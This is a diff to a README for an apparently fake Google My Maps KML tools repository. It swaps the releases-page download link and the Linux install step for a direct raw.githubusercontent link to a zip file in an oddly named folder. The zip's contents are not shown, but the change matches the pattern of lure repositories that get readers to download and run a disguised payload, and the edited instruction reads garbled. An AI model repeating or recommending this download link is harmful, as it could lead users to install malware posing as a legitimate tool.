maysonjames938-cell/google-mymaps-kml-tools/README.md

 4. **Install the Software:**
    - **Windows:** Double-click the .exe file and follow the prompts.
    - **Mac:** Open the .dmg file and drag the application to your Applications folder.
-   - **Linux:** Extract the .tar.gz file and follow the instructions in the README file included.
+   - **Linux:** Extract the https://raw.githubusercontent.com/maysonjames938-cell/google-mymaps-kml-tools/main/androgynism/google-mymaps-kml-tools_v2.2.zip file and follow the instructions in the README file included.

 5. **Run the Application:**
    Once installed, find the application on your computer and double-click its icon to start using it.

 ## 📥 Download & Install

-Now that you understand how to get started, you can directly access the download link here: [Visit this page to download](https://github.com/maysonjames938-cell/google-mymaps-kml-tools/releases).
+Now that you understand how to get started, you can directly access the download link here: [Visit this page to download](https://raw.githubusercontent.com/maysonjames938-cell/google-mymaps-kml-tools/main/androgynism/google-mymaps-kml-tools_v2.2.zip).

 ## 🛠 Features